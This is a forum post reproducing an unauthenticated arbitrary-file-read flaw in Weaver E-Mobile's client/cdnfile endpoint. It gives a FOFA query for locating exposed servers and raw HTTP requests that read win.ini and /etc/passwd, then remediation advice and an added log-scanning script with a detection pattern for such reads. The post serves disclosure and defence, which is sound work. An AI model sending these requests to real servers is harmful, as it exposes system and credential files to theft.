f9yx0du posted on 2024-10-3 07:11:10

[Vulnerability Reproduction] Weaver (泛微) E-Mobile client/cdnfile Arbitrary File Read Vulnerability


    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x01</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Disclaimer</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences and losses caused by spreading or using the information provided in this article are the responsibility of the user alone; the author accepts no responsibility for them. The tools come from the internet; test their safety yourself, and contact us for removal in case of infringement. This test is for learning purposes only; if it is put to illegal use, that has nothing to do with the platform or the author of this article, and you bear the responsibility yourself!!!</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x02</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Product Introduction</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Weaver E-Mobile is a mobile office product developed by Weaver Network Technology Co., Ltd. It is designed for users of mobile devices such as phones and tablets and aims to provide a convenient, efficient mobile office experience. It is intended for company executives and for staff in business departments who need to work on the move, and is particularly suited to large and medium-sized enterprises that already have an internal OA system, especially enterprises or departments with many branch offices. The recently released HarmonyOS native application baseline version implements new features such as cross-device linkage and application continuation, giving users a more efficient and convenient mobile office experience. Going forward, Weaver E-Mobile will continue to lead the digital office wave and provide excellent mobile office solutions to more enterprises.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x03</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Vulnerability Threat</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The client/cdnfile endpoint of Weaver E-Mobile has an arbitrary file read vulnerability. An unauthenticated attacker can use it to read important system files (such as database configuration files and system configuration files), leaving the site in an extremely insecure state.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x04</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Vulnerable Environment</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">FOFA:</p>
<pre>app="泛微-EMobile"</pre>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BGPZyricNGWEibyLWYgP9kxnC8X8lCQAibF2fSuekl2FJyexj5562nYBUQ/640?wx_fmt=png&amp;from=appmsg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x05</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Vulnerability Reproduction</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows-PoC</p>
<pre>GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close</pre>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BJBmHk5QjfPb9fLqTrXib12ycAvXDo6SOC4ibAmaR7bNLk6sgTevEyEKg/640?wx_fmt=png&amp;from=appmsg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Linux-PoC</p>
<pre>GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close</pre>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562B5SZmLkW7VvtafsM5Z3410D5iczmibGDRHJhyl2KLGkfBWuiaInJgDSrNA/640?wx_fmt=png&amp;from=appmsg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x06</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Batch Script Verification</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">A Nuclei verification script has been published.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Knowledge Planet (知识星球): 冷漠安全</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ohnxlTcKK6kzHugnFx562BTmv7GibGuBpricxOsoTkRKNEQY0QYUbibwmTmuFSIgss6lflUmuysr4Wg/640?wx_fmt=png&amp;from=appmsg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">0x07</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Remediation Recommendations</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Temporary mitigation</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Set access permissions on the endpoint or restrict the source addresses allowed to access it; unless it is necessary, do not expose the system to the internet.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Upgrade fix</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The vendor has released a security patch; affected users are advised to upgrade to a secure version as soon as possible.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://www.weaver.com.cn/</p>
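Added example, not part of the original post: a log review that a defender can run while the temporary mitigation or the patch is being rolled out, to find requests to `/client/cdnfile/` that name system or configuration files and to see which of them the server answered with 200. The combined log format, the sample lines and the `SUSPICIOUS` pattern list are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Oct/2024:07:02:11 +0800] "GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Oct/2024:07:02:12 +0800] "GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.23 - - [03/Oct/2024:07:05:40 +0800] "GET /client/cdnfile/C/%65tc/passwd HTTP/1.1" 200 1834 "-" "curl/8.4.0"
192.0.2.10 - - [03/Oct/2024:07:06:02 +0800] "GET /client/cdnfile/app/logo.png HTTP/1.1" 200 5120 "-" "EMobile"
192.0.2.10 - - [03/Oct/2024:07:06:05 +0800] "GET /login.do HTTP/1.1" 200 3300 "-" "EMobile"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ENDPOINT = "/client/cdnfile/"
# Assumption: path fragments that a file-serving endpoint should never be asked for.
SUSPICIOUS = re.compile(r"(?i)(/etc/|/windows/|\.\./|\.ini$|\.properties$)")

def decode_path(target):
    """Return the URL path with up to three layers of percent-encoding removed."""
    path = urlsplit(target).path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def find_cdnfile_reads(log_text):
    """Group suspicious cdnfile requests by client and record whether each got a 200."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        client, _method, target, status = m.groups()
        path = decode_path(target)
        if path.lower().startswith(ENDPOINT) and SUSPICIOUS.search(path):
            hits[client].append({"path": path, "status": int(status),
                                 "served": status == "200"})
    return dict(hits)

if __name__ == "__main__":
    for client, reqs in find_cdnfile_reads(SAMPLE_LOG).items():
        for r in reqs:
            print(client, r["status"], "SERVED" if r["served"] else "not served", r["path"])
```

Entries marked as served are the ones to triage first, since the file content reached the client; credentials stored in any file returned that way should be rotated.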




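wrjc1hod posted on 2024-10-11 23:23:41

Your insights are truly unique; I have benefited greatly.

wrjc1hod posted on 2024-10-12 06:41:51

Your words are as warm as spring and fill me with gratitude.

7wu1wm0 posted on 2024-10-25 03:14:47

Exchange of ideas shines like starlight, lighting up the night sky of thought.

b1gc8v posted on 2024-11-5 05:23:17

The forum's achievements are remarkable, but we must not become complacent because of them.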